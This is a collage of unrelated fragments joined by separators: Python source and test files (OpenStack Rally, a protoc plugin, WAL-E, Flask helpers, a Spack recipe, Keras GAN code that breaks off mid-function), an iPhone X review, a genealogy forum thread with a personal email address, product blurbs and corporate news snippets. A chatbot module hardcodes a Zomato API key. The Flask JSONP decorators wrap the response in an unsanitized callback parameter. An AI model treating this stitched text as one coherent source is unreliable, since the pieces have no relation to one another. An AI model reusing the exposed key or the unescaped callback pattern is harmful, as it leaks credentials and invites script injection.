There's also a MASSIVE TV the team uses to test that its Breaking Bad content is working.
Disclosure: Fairfax Media owns Allure Media, publisher of Business Insider Australia. |
# Copyright 2013: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Test ExistingCloud."""
import jsonschema
from rally import deploy
from rally.deploy.engines import existing
from tests import test
class TestExistingCloud(test.TestCase):
def setUp(self):
self.deployment = {
'config': {
'name': 'ExistingCloud',
'endpoint': {
'auth_url': 'http://example.net:5000/v2.0/',
'username': 'admin',
'password': 'myadminpass',
'tenant_name': 'demo',
},
},
}
super(TestExistingCloud, self).setUp()
def test_init(self):
existing.ExistingCloud(self.deployment)
def test_init_invalid_config(self):
self.deployment['config']['endpoint'] = 42
self.assertRaises(jsonschema.ValidationError,
existing.ExistingCloud, self.deployment)
def test_deploy(self):
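        # ExistingCloud performs no provisioning; deploy() should simply echo
        # the configured endpoint back, so the round trip must be lossless.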
engine = existing.ExistingCloud(self.deployment)
endpoints = engine.deploy()
admin_endpoint = self.deployment['config']['endpoint'].copy()
self.assertEqual(admin_endpoint, endpoints[0].to_dict())
def test_cleanup(self):
existing.ExistingCloud(self.deployment).cleanup()
def test_is_in_factory(self):
name = self.deployment['config']['name']
engine = deploy.EngineFactory.get_engine(name,
self.deployment)
self.assertIsInstance(engine, existing.ExistingCloud)
|
I’m not interested in Satuhn, I said Mahs.
- Arnold Schwarzenegger, Total Recall.
An interesting production from Louis Vuitton: take a look at one of the most in-depth digital mappings of the red planet.
RED JOURNEY from MANEKI LAB on Vimeo. |
#!/usr/bin/env python
#
# Copyright 2017 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
from google.protobuf.compiler import plugin_pb2 as plugin
from google.protobuf.descriptor_pb2 import ServiceDescriptorProto, \
MethodOptions
from jinja2 import Template
from simplejson import dumps
import yang_options_pb2
from netconf.protos.third_party.google.api import annotations_pb2, http_pb2
_ = annotations_pb2, http_pb2 # to keep import line from being optimized out
template = Template("""
# Generated file; please do not edit
from simplejson import dumps, load
from structlog import get_logger
from google.protobuf.json_format import MessageToDict, ParseDict
from twisted.internet.defer import inlineCallbacks, returnValue
{% set package = file_name.replace('.proto', '') %}
{% for pypackage, module in includes %}
{% if pypackage %}
from {{ pypackage }} import {{ module }}
{% else %}
import {{ module }}
{% endif %}
{% endfor %}
log = get_logger()
{% for method in methods %}
{% set method_name = method['service'].rpartition('.')[2] + '_' + method['method'] %}
@inlineCallbacks
def {{ method_name }}(grpc_client, params, metadata, **kw):
log.info('{{ method_name }}', params=params, metadata=metadata, **kw)
data = params
data.update(kw)
try:
req = ParseDict(data, {{ type_map[method['input_type']] }}())
except Exception, e:
log.error('cannot-convert-to-protobuf', e=e, data=data)
raise
res, _ = yield grpc_client.invoke(
{{ type_map[method['service']] }}Stub,
'{{ method['method'] }}', req, metadata)
try:
out_data = grpc_client.convertToDict(res)
except AttributeError, e:
filename = '/tmp/netconf_failed_to_convert_data.pbd'
with file(filename, 'w') as f:
f.write(res.SerializeToString())
log.error('cannot-convert-from-protobuf', outdata_saved=filename)
raise
log.info('{{ method_name }}', **out_data)
returnValue(out_data)
def get_xml_tag_{{ method_name }}():
return '{{ method['xml_tag'] }}'
def get_list_items_name_{{ method_name }}():
return '{{ method['list_item_name'] }}'
def get_return_type_{{ method_name }}():
return '{{ type_map[method['output_type']] }}'
{% endfor %}
""", trim_blocks=True, lstrip_blocks=True)
def traverse_methods(proto_file):
package = proto_file.name
for service in proto_file.service:
assert isinstance(service, ServiceDescriptorProto)
for method in service.method:
input_type = method.input_type
if input_type.startswith('.'):
input_type = input_type[1:]
output_type = method.output_type
if output_type.startswith('.'):
output_type = output_type[1:]
# Process any specific yang option
xml_tag = ''
list_item_name = ''
options = method.options
assert isinstance(options, MethodOptions)
for fd, yang_tag in options.ListFields():
if fd.full_name == 'voltha.yang_xml_tag':
if yang_tag.xml_tag:
xml_tag = yang_tag.xml_tag
if yang_tag.list_items_name:
list_item_name = yang_tag.list_items_name
data = {
'package': package,
'filename': proto_file.name,
'service': proto_file.package + '.' + service.name,
'method': method.name,
'input_type': input_type,
'output_type': output_type,
'xml_tag': xml_tag,
'list_item_name': list_item_name
}
yield data
def generate_gw_code(file_name, methods, type_map, includes):
return template.render(file_name=file_name, methods=methods,
type_map=type_map, includes=includes)
class IncludeManager(object):
# need to keep track of what files define what message types and
# under what package name. Later, when we analyze the methods, we
# need to be able to derive the list of files we need to load and we
# also need to replce the <proto-package-name>.<artifact-name> in the
# templates with <python-package-name>.<artifact-name> so Python can
# resolve these.
def __init__(self):
self.package_to_localname = {}
self.fullname_to_filename = {}
self.prefix_table = [] # sorted table of top-level symbols in protos
self.type_map = {} # full name as used in .proto -> python name
self.includes_needed = set() # names of files needed to be included
self.filename_to_module = {} # filename -> (package, module)
def extend_symbol_tables(self, proto_file):
# keep track of what file adds what top-level symbol to what abstract
# package name
package_name = proto_file.package
file_name = proto_file.name
self._add_filename(file_name)
all_defs = list(proto_file.message_type)
all_defs.extend(list(proto_file.enum_type))
all_defs.extend(list(proto_file.service))
for typedef in all_defs:
name = typedef.name
fullname = package_name + '.' + name
self.fullname_to_filename[fullname] = file_name
self.package_to_localname.setdefault(package_name, []).append(name)
self._update_prefix_table()
def _add_filename(self, filename):
if filename not in self.filename_to_module:
python_path = filename.replace('.proto', '_pb2').replace('/', '.')
package_name, _, module_name = python_path.rpartition('.')
self.filename_to_module[filename] = (package_name, module_name)
def _update_prefix_table(self):
# make a sorted list symbol prefixes needed to resolv for potential use
# of nested symbols
self.prefix_table = sorted(self.fullname_to_filename.iterkeys(),
reverse=True)
def _find_matching_prefix(self, fullname):
for prefix in self.prefix_table:
if fullname.startswith(prefix):
return prefix
# This should never happen
raise Exception('No match for type name "{}"'.format(fullname))
def add_needed_symbol(self, fullname):
if fullname in self.type_map:
return
top_level_symbol = self._find_matching_prefix(fullname)
name = top_level_symbol.rpartition('.')[2]
nested_name = fullname[len(top_level_symbol):] # may be empty
file_name = self.fullname_to_filename[top_level_symbol]
self.includes_needed.add(file_name)
module_name = self.filename_to_module[file_name][1]
python_name = module_name + '.' + name + nested_name
self.type_map[fullname] = python_name
def get_type_map(self):
return self.type_map
def get_includes(self):
return sorted(
self.filename_to_module[fn] for fn in self.includes_needed)
def generate_code(request, response):
assert isinstance(request, plugin.CodeGeneratorRequest)
include_manager = IncludeManager()
for proto_file in request.proto_file:
include_manager.extend_symbol_tables(proto_file)
methods = []
for data in traverse_methods(proto_file):
methods.append(data)
include_manager.add_needed_symbol(data['input_type'])
include_manager.add_needed_symbol(data['output_type'])
include_manager.add_needed_symbol(data['service'])
type_map = include_manager.get_type_map()
includes = include_manager.get_includes()
# as a nice side-effect, generate a json file capturing the essence
# of the RPC method entries
f = response.file.add()
f.name = proto_file.name + '.json'
f.content = dumps(dict(
type_rename_map=type_map,
includes=includes,
methods=methods), indent=4)
# generate the real Python code file
f = response.file.add()
assert proto_file.name.endswith('.proto')
f.name = proto_file.name.replace('.proto', '_rpc_gw.py')
f.content = generate_gw_code(proto_file.name,
methods, type_map, includes)
if __name__ == '__main__':
if len(sys.argv) >= 2:
# read input from file, to allow troubleshooting
with open(sys.argv[1], 'r') as f:
data = f.read()
else:
# read input from stdin
data = sys.stdin.read()
# parse request
request = plugin.CodeGeneratorRequest()
request.ParseFromString(data)
# create response object
response = plugin.CodeGeneratorResponse()
# generate the output and the response
generate_code(request, response)
# serialize the response
output = response.SerializeToString()
# write response to stdout
sys.stdout.write(output)
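# Usage sketch (hypothetical paths): protoc drives this file as a plugin and
# feeds a serialized CodeGeneratorRequest on stdin, e.g.
#
#   protoc -I protos \
#          --plugin=protoc-gen-netconf=$(pwd)/this_script.py \
#          --netconf_out=build protos/voltha.proto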
|
I am glad to see this forum pop up. My late mother, Helen E. Rafferty, did extensive genealogy on our family lines, one of which was Bolles. Here is a thumbnail sketch:
1. Joseph 1608
2. Joseph 1654-1683
3. Joseph 1680?
4. Joseph 1712-?
5. Lemuel 1755-1805
6. Erastus 1788-1859
7. David 1823-1850
8. Ellen Georgiana 1848-1935
9. Ernest Valentine McNally 1877-1945
10. Helen Elizabeth McNally Rafferty 1908-98
Ernest was my maternal grandfather, married to Anna Barbara Byer. They were involved with the silk mills in Pennsylvania and in Belding, MI, where, after the closure of the mills in 1932, he became mayor of Belding, served on the school board and managed the Belding Hotel. Ellen Georgiana came to live with them and died in a tragic kitchen fire. My mother was made a member of the D.A.R. through Lemuel's service.
Though several family histories mention her, none will stand up to the standards of lineage societies. Marcy Crouch went on to marry Ichabod Pierce.
Does anyone have any documentation proving the relationship between Christiana Bolles and daughter Mary Crouch? I would be so grateful!
Hello, all! My name is Maureen and I am researching my family ancestry. Does anyone have any information on John Robinson Bolles (born 1762/1763 in New London, CT)? He married his cousin, Rebecca Bolles in 1788. I am looking for documentation to support these events. I am also in need of information/documentation on Rebecca Bolles. I believe she later remarried a George Lapham, and at some point moved to Michigan possibly to live with her son Frederick. Any help is greatly appreciated. I need the documentation for membership in DAR. My email is reanniec@gmail.com. Thank you.
Thanks so much for the updated Bolles /Frost info. Greatly appreciated!
1. Joseph Bolles (from Scampton, England) had a daughter.
    3. Joseph Bolles.
Does anyone know the connection between the Bolles family and the Salter, Frost, Hayes, and Shepley families of Maine? Thank you!
Bolles family in Woodford, Vermont. We were wondering if anyone has found a will or estate record for Phineas Bolles, who died 20 Oct 1867 in Woodford, Vermont. We are trying to prove he had a daughter named Phila who married a Hicks/Hix and lived in Sunderland. So far we have found no proof that Phila Bolles is part of this family.
import pytest
from stage_pgxlog import pg_xlog
from wal_e import worker
from wal_e import exception
# Quiet pyflakes about pytest fixtures.
assert pg_xlog
def make_segment(num, **kwargs):
return worker.WalSegment('pg_xlog/' + str(num) * 8 * 3, **kwargs)
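    # (PostgreSQL WAL segment names are 24 hex digits: 8 for the timeline ID,
    # 8 for the log number and 8 for the segment number; str(num) * 8 * 3
    # fakes that shape with a repeated digit.)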
def test_simple_create():
"""Check __init__."""
make_segment(1)
def test_mark_done_invariant():
"""Check explicit segments cannot be .mark_done'd."""
seg = make_segment(1, explicit=True)
with pytest.raises(exception.UserCritical):
seg.mark_done()
def test_mark_done(pg_xlog):
"""Check non-explicit segments can be .mark_done'd."""
seg = make_segment(1, explicit=False)
pg_xlog.touch(seg.name, '.ready')
seg.mark_done()
def test_mark_done_problem(pg_xlog, monkeypatch):
"""Check that mark_done fails loudly if status file is missing.
While in normal operation, WAL-E does not expect races against
other processes manipulating .ready files. But, just in case that
should occur, WAL-E is designed to crash, exercised here.
"""
seg = make_segment(1, explicit=False)
with pytest.raises(exception.UserCritical):
seg.mark_done()
def test_simple_search(pg_xlog):
"""Must find a .ready file"""
name = '1' * 8 * 3
pg_xlog.touch(name, '.ready')
segs = worker.WalSegment.from_ready_archive_status('pg_xlog')
assert segs.next().path == 'pg_xlog/' + name
with pytest.raises(StopIteration):
segs.next()
def test_multi_search(pg_xlog):
"""Test finding a few ready files.
Also throw in some random junk to make sure they are filtered out
from processing correctly.
"""
for i in xrange(3):
ready = str(i) * 8 * 3
pg_xlog.touch(ready, '.ready')
# Throw in a complete segment that should be ignored.
complete_segment_name = 'F' * 8 * 3
pg_xlog.touch(complete_segment_name, '.done')
# Throw in a history-file-alike that also should not be found,
# even if it's ready.
ready_history_file_name = ('F' * 8) + '.history'
pg_xlog.touch(ready_history_file_name, '.ready')
segs = worker.WalSegment.from_ready_archive_status(str(pg_xlog.pg_xlog))
for i, seg in enumerate(segs):
assert seg.name == str(i) * 8 * 3
assert i == 2
# Make sure nothing interesting happened to ignored files.
pg_xlog.assert_exists(complete_segment_name, '.done')
pg_xlog.assert_exists(ready_history_file_name, '.ready')
|
Is iPhone X Really The Future Of The Smartphone?
Should iPhone X even be called a telephone? It does of course support telephony and texting, but its main feature set is oriented to other things. It is also debatable whether it makes any rational sense at all to be walking around with a device in your pocket that sells for $1,000 and up unless you travel with a retinue of personal bodyguards.
Then there’s the matter of overkill. The iPhone X’s A11 Bionic six-core system-on-chip would have placed it in the supercomputer category back in the ’80s and ’90s. Apple says it’s the most powerful and smartest chip ever deployed in a smartphone, with two performance cores that are 25 percent faster and four efficiency cores that are 70 percent faster than those of the preceding A10 Fusion SoC, plus a new, second-generation performance controller that can harness all six cores simultaneously, delivering up to 70 percent greater performance for multi-threaded workloads, with battery life two hours longer than the iPhone 7’s. A11 Bionic also has an Apple-designed three-core GPU that Apple claims delivers up to 30 percent faster graphics performance than the previous generation of iPhone GPUs.
The trouble is, all this power will likely get used mostly for entertaining but trivial pursuits. iPhone X’s neural engine in A11 Bionic is purpose-built for machine learning, augmented reality apps and immersive 3D games — a dual-core chip that can perform up to 600 billion operations per second for real-time processing, designed for specific machine learning algorithms and also enables Face ID (which does have practical uses), Animoji and other features demanding large amounts of computing power.
To create Animoji, working with A11 Bionic, the TrueDepth camera captures and analyzes over 50 different facial expression muscle movements which it then animates in a dozen different Animoji templates, including a panda, a unicorn and a robot. Available as an iMessage app pre-installed on iPhone X, users can record and send Animoji messages with their voice that can smile, frown and more. Whatever floats your boat I guess.
Apple says iPhone X ‘s all-glass front and back, available in silver and space grey, feature the most durable glass ever used in a smartphone.
iPhone X’s 5.8-inch Super Retina water and dust resistant all-screen display employs new OLED technology enabling it to precisely follow the curves of the design, all the way to the rounded corners. A seven-layer colour process allows for precise colour hues and opacity on the glass finish, enhanced by a reflective optical layer.
Apple says the iPhone X display is the first OLED panel that rises to iPhone standards with true blacks, a million-to-one contrast ratio, and system-wide colour management in a smartphone, also supporting Dolby Vision, HDR, and HDR10, and the addition of True Tone dynamically adjusts the white balance of the display to match the surrounding light.
It is the latter by default, but the future of the smartphone I think not, at least not in any mass-market sense. It’s too expensive for starters, and the mainstream smartphone market is not interested in paying premium prices for “fluid new user experiences” on their mobiles. None of Mr. Schiller’s list of marquee iPhone X features solves practical problems that any of us knew we had. Very few smartphone users have any practical reason to carry a supercomputer that can perform up to 600 billion operations per second in their pocket. The personal security issues discussed above also pertain.
A better choice for most of us will be iPhone 8 or iPhone 8 Plus, a more evolutionary design featuring new Retina HD displays and powered by the A11 Bionic SoC. The iPhone 8s get upgraded cameras with Portrait mode and Portrait Lighting, support wireless charging, and augmented reality (AR) optimization unprecedented in a smartphone.
Space grey, silver and gold finishes on iPhone 8 and iPhone 8 Plus are made using a similar process to the one used in iPhone X, and introduce a water and dust resistant glass back design made with more of that most durable glass ever in a smartphone, plus a colour-matched aerospace-grade aluminum bezel. Their 4.7-inch and 5.5-inch Retina HD displays now support True Tone, and Apple says their redesigned stereo speakers are up to 25 percent louder and deliver deeper bass.
iPhone 8 and iPhone 8 Plus feature an improved 12-megapixel camera with a larger and faster sensor, a new colour filter, and a new Apple-designed image signal processor that delivers advanced pixel processing, wide colour capture, faster autofocus in low light and better HDR photos, while a new quad-LED True Tone Flash with Slow Sync results in more uniformly lit backgrounds and foregrounds.
Apple says each camera is individually calibrated, with new gyroscopes and accelerometers for accurate motion tracking, and AR benefits from A11 Bionic, which handles world tracking, scene recognition and graphics at 60fps, while the image signal processor does real-time lighting estimation.
iPhone X will be available in silver and space grey in 64GB and 256GB models starting at $999, and iPhone 8 and iPhone 8 Plus will be available in space grey, silver and an all-new gold finish in increased 64GB and 256GB capacities starting at $699 (US) from http://apple.com and Apple Stores, and will also be available through Apple Authorized Resellers and carriers (prices may vary).
iPhone 8 and iPhone 8 Plus are not cheap either, but if you can afford the price of ownership (or can live with monthly payments through Apple’s new iPhone Upgrade Program), with them and iPhone X Apple has again raised the bar for the smartphone state of the art.
import collections
import datetime
import json
import re

from flask import Flask, current_app, request
from functools import wraps
class JSONEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, datetime.datetime):
return obj.isoformat()
return json.JSONEncoder.default(self, obj)
def jsonify(*args, **kwargs):
return current_app.response_class(json.dumps(dict(*args, **kwargs),
indent=None if request.is_xhr else 2, cls=JSONEncoder),
mimetype='application/json')
def support_jsonp(f):
"""Wraps JSONified output for JSONP"""
@wraps(f)
def decorated_function(*args, **kwargs):
callback = request.args.get('callback', False)
if callback:
content = str(callback) + '(' + str(f().data) + ')'
return current_app.response_class(content, mimetype='application/json')
else:
return f(*args, **kwargs)
return decorated_function
def support_jsonp_publishercode(f):
"""Wraps JSONified output for JSONP"""
@wraps(f)
def decorated_function(*args, **kwargs):
callback = request.args.get('callback', False)
if callback:
content = str(callback) + '(' + str(f(kwargs['publisher_code']).data) + ')'
return current_app.response_class(content, mimetype='application/json')
else:
return f(*args, **kwargs)
return decorated_function
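# Illustrative usage of the two JSONP decorators above (a sketch; the Flask
# app object and the route are assumptions, not part of this module):
#
#   app = Flask(__name__)
#
#   @app.route('/api/publishers/<publisher_code>')
#   @support_jsonp_publishercode
#   def publisher(publisher_code):
#       return jsonify(publisher=publisher_code)
#
# GET /api/publishers/abc?callback=cb then returns cb({"publisher": "abc"})
# with an application/json mimetype; without ?callback= it returns plain JSON.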
def publication_timeline(data, cumulative=False, group=6, provide={7,2}, label_group="date", label_provide={"count", "element"}):
properties = set(map(lambda x: (str(x[group])), data))
b = map(lambda x: (x[group],list(map(lambda y: str(x[y]), provide))), data)
out = {}
out['publication'] = {}
out['publication_sorted'] = {}
out['unknown'] = {}
for s, k in b:
try:
if (k[0] != "None"):
out['publication'][str(s)].update({(k[0], k[1])})
else:
out['unknown'][str(s)].update({(k[0], k[1])})
except KeyError:
if (k[0] != "None"):
out['publication'][str(s)] = {}
out['publication'][str(s)].update({(k[0], k[1])})
else:
out['unknown'][str(s)] = {}
out['unknown'][str(s)].update({(k[0], k[1])})
for t in out:
try:
a=out[t]
except KeyError:
out[t] = 0
out['publication_sorted'] = []
for e, v in out['publication'].items():
prevkey_val = 0
latest_count = {}
try:
del v["None"]
except KeyError:
pass
for key in sorted(v.iterkeys()):
newdata = {}
newdata[label_group] = e
if (cumulative == True):
try:
latest_count[e] = int(v[key])
except KeyError:
latest_count[e] = 0
prevkey_val = int(v[key]) + prevkey_val
newdata["count"] = int(v[key]) + latest_count[e]
newdata["element"] = key
out['publication_sorted'].append(newdata)
return out
def publication_dates_groups(data, cumulative=False, group=6, provide={7,2}, label_group="date", label_provide={"count", "element"}):
dates = set(map(lambda x: (str(x[group])), data))
elements = set(map(lambda x: (x[2]), data))
alldata = map(lambda x: ((str(x[group]), x[2]),x[7]), data)
b = map(lambda x: (x[group],list(map(lambda y: str(x[y]), provide))), data)
out = {}
out["dates"] = []
prev_values = {}
for p in sorted(dates):
# get each element
newdata = {}
newdata["date"] = p
for e in elements:
try:
prev_values[e]
except KeyError:
prev_values[e] = 0
newdata[e] = 0
for data in alldata:
if ((data[0][0] == p) and (data[0][1]==e)):
newdata[e] = data[1]
prev_values[e] = prev_values[e] + data[1]
else:
newdata[e] = prev_values[e]
if (newdata[e] == 0):
newdata[e] = prev_values[e]
out["dates"].append(newdata)
# get each date
return out
def nest_compliance_results(data):
properties = set(map(lambda x: (x[2]), data))
b = map(lambda x: (x[2],(x[6], x[7])), data)
out = {}
for s, k in b:
try:
out[s].update({(k[0], k[1])})
except KeyError:
out[s] = {}
out[s].update({(k[0], k[1])})
values = {'fc', 'pc', 'uc', 'fp', 'up'}
for t in out:
for v in values:
try:
a=out[t][v]
except KeyError:
out[t][v] = 0
return out
def toUs(element):
# replace hyphen with underscore
us = re.sub("-", "_", element)
return us
def merge_dict(d1, d2):
# from here: http://stackoverflow.com/questions/10703858/python-merge-multi-level-dictionaries
"""
Modifies d1 in-place to contain values from d2. If any value
in d1 is a dictionary (or dict-like), *and* the corresponding
value in d2 is also a dictionary, then merge them in-place.
"""
for k,v2 in d2.items():
v1 = d1.get(k) # returns None if v1 has no value for this key
if ( isinstance(v1, collections.Mapping) and
isinstance(v2, collections.Mapping) ):
merge_dict(v1, v2)
else:
d1[k] = v2 |
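# Example of merge_dict in action (illustrative, not part of the original
# module): nested mappings are merged recursively, scalars are overwritten.
#
#   d1 = {'a': {'x': 1}, 'b': 0}
#   merge_dict(d1, {'a': {'y': 2}, 'b': 3})
#   # d1 is now {'a': {'x': 1, 'y': 2}, 'b': 3}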
Re: iMessage and the perceived green bubble of fail..
Using WhatsApp means bending over for faecebook.
Who even knows about Telegram, seems like a shady outfit too. |
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class IbmDatabroker(CMakePackage, PythonPackage):
"""The Data Broker (DBR) is a distributed, in-memory container of key-value
stores enabling applications in a workflow to exchange data through one or
more shared namespaces. Thanks to a small set of primitives, applications
in a workflow deployed in a (possibly) shared nothing distributed cluster,
can easily share and exchange data and messages with applications."""
homepage = "https://github.com/IBM/data-broker"
git = "https://github.com/IBM/data-broker"
url = 'https://github.com/IBM/data-broker/archive/0.6.1.tar.gz'
# IBM dev team should take over
maintainers = ['bhatiaharsh']
version('master', branch='master')
version('0.7.0', sha256='5460fa1c5c05ad25c759b2ee4cecee92980d4dde5bc7c5f6da9242806cf22bb8')
version('0.6.1', sha256='2c7d6c6a269d4ae97aad4d770533e742f367da84758130c283733f25df83e535')
version('0.6.0', sha256='5856209d965c923548ebb69119344f1fc596d4c0631121b230448cc91bac4290')
variant('python', default=False, description='Build Python bindings')
depends_on('cmake@2.8:', type='build')
depends_on('redis@5.0.2:', type='run')
depends_on('libevent@2.1.8', type=('build', 'run'))
extends('python@3.7:', when='+python')
depends_on('py-setuptools', when='+python')
patch('fixes_in_v0.6.1.patch', when='@0.6.1')
patch('fixes_in_v0.7.0.patch', when='@0.7.0')
def cmake_args(self):
args = []
args.append('-DDEFAULT_BE=redis')
if '+python' in self.spec:
args.append('-DPYDBR=1')
return args
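    # Illustrative usage from the command line (not part of the recipe);
    # Spack derives the package name 'ibm-databroker' from the class name:
    #   spack install ibm-databroker +python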
|
The StressFix formula contains 93% active ingredients. It strengthens the skin barrier, fights free radicals and blocks pollutants.
Shea Butter, Stearic Acid, Moringa Oleifera Seed Oil, Glycerin, Cetyl Alcohol, Tocopheryl Acetate, Cetearyl Olivate, Sorbitan Oleate, Glyceryl Stearate, Sorbitan Olivate, Glyceryl Caprylate, Cholesterol, Polyoxymethylene Melamine, Arginine, Caprylhydroxamic Acid, Decarboxy Carmosine HCL, Hydrolyzed Sodium Hyaluronate, Xanthan Gum, Yeast Extract, Butylene Glycol, Sunflower Seed Oil, Rosemary Leaf Extract, 1,2-Hexanediol, Caprylyl Glycol, Phenoxyethanol, Fragrance (Parfum), Iron Oxides (CI 77499), Limonene, Benzyl Benzoate, Linalool.
'''
Copyright 2016 Debayan Banerjee, Shreyank Gupta
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import urllib2,json
from random import randint
class WeekendModel(object):
dc = {}
def __init__(self, logger):
self.logger = logger
self.restaurant_name = None
self.restaurant_address = None
self.movie_name = None
self.zomatokey = '39e91731af08d26261adf655948d9daa'
def ifintentclear(self, stt, text=None, reply=[]):
if 'movie' in text.lower() or 'restaurant' in text.lower():
return True
else:
return False
def ifintentmovie(self, stt, text=None, reply=[]):
if 'movie' in text.lower():
req = urllib2.Request("http://www.omdbapi.com/?s=bot")
contents = urllib2.urlopen(req).read()
d = json.loads(str(contents))
sub = randint(0,9)
self.movie_name = d['Search'][sub]['Title']
return True
else:
return False
def ifintentrestaurant(self, stt, text=None, reply=[]):
if 'restaurant' in text.lower():
return True
else:
return False
def ifvalidcity(self, stt, text=None, reply=[]):
req = urllib2.Request("https://developers.zomato.com/api/v2.1/locations?query=%s"%text, headers={'user-key': '39e91731af08d26261adf655948d9daa','Accept':'application/json'})
contents = urllib2.urlopen(req).read()
d = json.loads(contents)
if len(d['location_suggestions']) == 0:
return False
else:
entity_id = d['location_suggestions'][0]['entity_id']
entity_type = d['location_suggestions'][0]['entity_type']
d = {}
req = urllib2.Request("https://developers.zomato.com/api/v2.1/location_details?entity_id=%s&entity_type=%s"%(entity_id, entity_type), headers={'user-key': '39e91731af08d26261adf655948d9daa','Accept':'application/json'})
contents = urllib2.urlopen(req).read()
d = json.loads(contents)
self.restaurant_name = d['best_rated_restaurant'][0]['restaurant']['name']
self.restaurant_address = d['best_rated_restaurant'][0]['restaurant']['location']['address']
return True
|
The company provides uniform, food and facilities services to establishments like schools, prisons, and workplaces.
The company will begin to ditch single-use plastic straws, where possible, in September.
A pilot program with Apple and Aramark is running from July 20 to August 5 at Citizens Bank Park.
The NFL, PepsiCo, and Aramark team up in Minneapolis.
A closer look at the organization's methods offers a useful case study in the art of advocacy and negotiation. |
from keras.models import Model
from keras.layers.core import Flatten, Dense, Dropout, Activation, Lambda, Reshape
from keras.layers.convolutional import Conv2D, Deconv2D, ZeroPadding2D, UpSampling2D
from keras.layers import Input, merge
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.normalization import BatchNormalization
from keras.layers.pooling import MaxPooling2D
import keras.backend as K
def generator_upsampling(cat_dim, cont_dim, noise_dim, img_dim, bn_mode, model_name="generator_upsampling", dset="mnist"):
"""
Generator model of the DCGAN
args : img_dim (tuple of int) num_chan, height, width
pretr_weights_file (str) file holding pre trained weights
returns : model (keras NN) the Neural Net model
"""
s = img_dim[1]
f = 128
if dset == "mnist":
start_dim = int(s / 4)
nb_upconv = 2
else:
start_dim = int(s / 16)
nb_upconv = 4
if K.image_dim_ordering() == "th":
bn_axis = 1
reshape_shape = (f, start_dim, start_dim)
output_channels = img_dim[0]
else:
reshape_shape = (start_dim, start_dim, f)
bn_axis = -1
output_channels = img_dim[-1]
cat_input = Input(shape=cat_dim, name="cat_input")
cont_input = Input(shape=cont_dim, name="cont_input")
noise_input = Input(shape=noise_dim, name="noise_input")
gen_input = merge([cat_input, cont_input, noise_input], mode="concat")
x = Dense(1024)(gen_input)
x = BatchNormalization()(x)
x = Activation("relu")(x)
x = Dense(f * start_dim * start_dim)(x)
x = BatchNormalization()(x)
x = Activation("relu")(x)
x = Reshape(reshape_shape)(x)
# Upscaling blocks
for i in range(nb_upconv):
x = UpSampling2D(size=(2, 2))(x)
nb_filters = int(f / (2 ** (i + 1)))
x = Conv2D(nb_filters, (3, 3), padding="same")(x)
x = BatchNormalization(axis=bn_axis)(x)
x = Activation("relu")(x)
# x = Conv2D(nb_filters, (3, 3), padding="same")(x)
# x = BatchNormalization(axis=bn_axis)(x)
# x = Activation("relu")(x)
x = Conv2D(output_channels, (3, 3), name="gen_Conv2D_final", padding="same", activation='tanh')(x)
generator_model = Model(inputs=[cat_input, cont_input, noise_input], outputs=[x], name=model_name)
return generator_model
def generator_deconv(cat_dim, cont_dim, noise_dim, img_dim, bn_mode, batch_size, model_name="generator_deconv", dset="mnist"):
"""
Generator model of the DCGAN
args : nb_classes (int) number of classes
img_dim (tuple of int) num_chan, height, width
pretr_weights_file (str) file holding pre trained weights
returns : model (keras NN) the Neural Net model
"""
assert K.backend() == "tensorflow", "Deconv not implemented with theano"
s = img_dim[1]
f = 128
if dset == "mnist":
start_dim = int(s / 4)
nb_upconv = 2
else:
start_dim = int(s / 16)
nb_upconv = 4
reshape_shape = (start_dim, start_dim, f)
bn_axis = -1
output_channels = img_dim[-1]
cat_input = Input(shape=cat_dim, name="cat_input")
cont_input = Input(shape=cont_dim, name="cont_input")
noise_input = Input(shape=noise_dim, name="noise_input")
gen_input = merge([cat_input, cont_input, noise_input], mode="concat")
x = Dense(1024)(gen_input)
x = BatchNormalization()(x)
x = Activation("relu")(x)
x = Dense(f * start_dim * start_dim)(x)
x = BatchNormalization()(x)
x = Activation("relu")(x)
x = Reshape(reshape_shape)(x)
# Transposed conv blocks
for i in range(nb_upconv - 1):
nb_filters = int(f / (2 ** (i + 1)))
s = start_dim * (2 ** (i + 1))
o_shape = (batch_size, s, s, nb_filters)
x = Deconv2D(nb_filters, (3, 3), output_shape=o_shape, strides=(2, 2), padding="same")(x)
x = BatchNormalization(mode=2, axis=bn_axis)(x)
x = Activation("relu")(x)
# Last block
s = start_dim * (2 ** (nb_upconv))
o_shape = (batch_size, s, s, output_channels)
x = Deconv2D(output_channels, (3, 3), output_shape=o_shape, strides=(2, 2), padding="same")(x)
x = Activation("tanh")(x)
generator_model = Model(inputs=[cat_input, cont_input, noise_input], outputs=[x], name=model_name)
return generator_model
def DCGAN_discriminator(cat_dim, cont_dim, img_dim, bn_mode, model_name="DCGAN_discriminator", dset="mnist", use_mbd=False):
"""
Discriminator model of the DCGAN
args : img_dim (tuple of int) num_chan, height, width
pretr_weights_file (str) file holding pre trained weights
returns : model (keras NN) the Neural Net model
"""
if K.image_dim_ordering() == "th":
bn_axis = 1
else:
bn_axis = -1
disc_input = Input(shape=img_dim, name="discriminator_input")
if dset == "mnist":
list_f = [128]
else:
